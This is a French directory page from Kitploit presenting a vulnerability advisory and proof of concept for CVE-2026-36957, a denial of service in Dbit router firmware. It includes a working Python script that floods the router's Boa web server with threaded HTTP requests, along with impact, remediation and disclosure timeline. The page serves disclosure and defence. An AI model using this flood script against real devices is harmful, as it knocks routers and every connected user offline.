Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-36957 — Preuve de concept pour CVE-2026-36957, une vulnérabilité de déni de service dans le firmware du routeur Dbit via une inondation HTTP sur le serveur web Boa, provoquant l'épuisement des ressources et le blocage du système. | Kitploit
Outils/GitHubGitHub/kirubel-cve/cve-2026-36957
Analyse des VulnérabilitésExploitationSécurité WebTests d'Intrusion
GitHubkirubel-cve/cve-2026-36957

CVE-2026-36957

Preuve de concept pour CVE-2026-36957, une vulnérabilité de déni de service dans le firmware du routeur Dbit via une inondation HTTP sur le serveur web Boa, provoquant l'épuisement des ressources et le blocage du système.

Voir le dépôt
il y a 3 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-36957 : Déni de service par inondation HTTP sur le serveur web Boa

ID CVE : CVE-2026-36957 Date : 2026-04-29 Découvreur : Kirubel Solomne Fournisseur : Shenzhen Dibit Network Equipment Co., Ltd. Produit : Routeur Dbit Version du firmware : V1.0.0 CWE : CWE-400 - Consommation de ressources non contrôlée


Description

Le firmware V1.0.0 du routeur Dbit est vulnérable à un déni de service via le gestionnaire d'URI du serveur web Boa. En envoyant un volume élevé de requêtes HTTP GET vers des URI inexistants, un attaquant peut épuiser les ressources système critiques, notamment les descripteurs de fichiers et les tampons mémoire. Cela entraîne un blocage du noyau ou un gel du système qui désactive le portail de gestion web et toutes les capacités de routage.


Score CVSS

Score CVSS v3.1 : 7,5 (Élevé) CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

MétriqueValeur
Vecteur d'attaqueRéseau
Complexité de l'attaqueFaible
Privilèges requisAucun
Interaction utilisateurAucune
Impact sur la confidentialitéAucun
Impact sur l'intégritéAucun
Impact sur la disponibilitéÉlevé

Preuve de concept

root@kitploit:~
import requests
import threading

TARGET = "http://192.168.10.1"

def flood(i):
    try:
        requests.get(f"{TARGET}/nonexistent_{i}", timeout=2)
    except:
        pass

threads = []
for i in range(1000):
    t = threading.Thread(target=flood, args=(i,))
    threads.append(t)
    t.start()

for t in threads:
    t.join()

print("Done. Check if router is still responsive.")

Comportement attendu : Le serveur doit limiter les connexions et rester stable. Comportement réel : L'interface web du routeur devient non réactive ; un redémarrage manuel est nécessaire.


Impact

  • Perte totale de l'interface de gestion web
  • Interruption de toutes les capacités de routage
  • Nécessite un redémarrage manuel pour restaurer le service
  • Indisponibilité du réseau pour tous les appareils connectés

Remédiation

  • Mettre en œuvre une limitation du débit de connexions sur le serveur web Boa
  • Ajouter un chien de garde (watchdog) pour récupérer des états de blocage
  • Limiter le nombre maximal de connexions simultanées par adresse IP

Chronologie de divulgation

DateÉvénement
2026-04-29Vulnérabilité découverte
2026-04-29Signalée à MITRE
2026-04-29CVE-2026-36957 attribuée
2026-04-29Divulgation publique

Références

  • MITRE CVE-2026-36957
  • CWE-400
  • Site web du fournisseur
Télécharger l’outil